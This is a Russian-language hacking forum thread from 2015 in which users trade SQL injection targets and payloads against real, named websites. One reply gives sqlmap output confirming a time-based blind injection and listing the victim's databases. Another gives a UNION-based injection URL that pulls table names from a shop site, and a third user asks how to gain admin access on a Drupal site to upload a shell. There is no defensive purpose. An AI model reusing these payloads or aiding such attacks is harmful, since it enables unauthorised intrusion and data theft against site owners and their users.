 |
|
23.10.2015, 10:08
|
|
Участник форума
Регистрация: 17.05.2015
Сообщений: 117
С нами:
5785526
Репутация:
6
|
|
Код HTML:
http://www.elektroline.cz/pdf/pdf_catalogue_item.php?id=3-7615%27
что можно сделать? |
|
|
23.10.2015, 13:32
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами:
9979143
Репутация:
-5
|
|
Сообщение от R3hab
↑
Код HTML:
http://www.elektroline.cz/pdf/pdf_catalogue_item.php?id=3-7615%27
что можно сделать?
sqlmap берет
Код:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=3' AND (SELECT * FROM (SELECT(SLEEP(5)))mWsI) AND 'FCqd'='FCqd
---
[12:26:48] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.6.0, Apache 2.4.10
back-end DBMS: MySQL 5.0.12
Базы:
available databases [3]:
[*] elektroline
[*] information_schema
[*] test
|
|
|
|
23.10.2015, 18:51
|
|
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами:
6868406
Репутация:
2
|
|
|
|
|
|
24.10.2015, 00:39
|
|
Новичок
Регистрация: 13.10.2015
Сообщений: 18
С нами:
5570966
Репутация:
0
|
|
|
|
|
|
24.10.2015, 00:40
|
|
Познающий
Регистрация: 23.11.2013
Сообщений: 46
С нами:
6563126
Репутация:
0
|
|
|
|
|
|
24.10.2015, 01:05
|
|
Новичок
Регистрация: 04.06.2015
Сообщений: 22
С нами:
5759606
Репутация:
0
|
|
Сообщение от xivi00
↑
http://www.navistory.kr/shop/m_navi_page.php?ps_pname=page_center&s_chk=3&id=(S ELECT+1+and+ROW(1,1)>(SELECT+COUNT(*),CONCAT(CHAR( 95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105) ,CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97), 0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CO LLATIONS+GROUP+BY+x)a)
sqlmap как в нем таблици вытащить что то чар не пагет(
Код:
http://www.navistory.kr/shop/m_navi_page.php?ps_pname=page_center&s_chk=3&id=-1/*! and 1=1 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema=database()*/+--
|
|
|
|
24.10.2015, 01:16
|
|
Новичок
Регистрация: 14.10.2015
Сообщений: 10
С нами:
5569526
Репутация:
0
|
|
Ребята подскажите, есть сайт на Drupal 7.34. Нет доступа с правами администратора но есть доступ в качестве юзера. Есть ли у этой версии какие то уязвимости? как получить доступ к админу? хочу залить шелл и получить доступ к файлам.
|
|
|
|
24.10.2015, 06:30
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами:
9979143
Репутация:
-5
|
|
|
|
|
|
24.10.2015, 13:27
|
|
Участник форума
Регистрация: 17.05.2015
Сообщений: 117
С нами:
5785526
Репутация:
6
|
|
Код HTML:
http://musics.bdwebs.tk/listen.php?id=fRh_vgS2dFE*
как то можно использовать эту ошибку? |
|
|
|
24.10.2015, 21:46
|
|
Новичок
Регистрация: 14.10.2015
Сообщений: 10
С нами:
5569526
Репутация:
0
|
|
спасибо за ответ. как я понял по ссылке список уязвимость. но как человек имеющий базовые знания но первый раз сталкивающийся с этим, можете в качестве примеров описать коротко по шагам как это применять, по примерам я пойму не совсем чайник.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
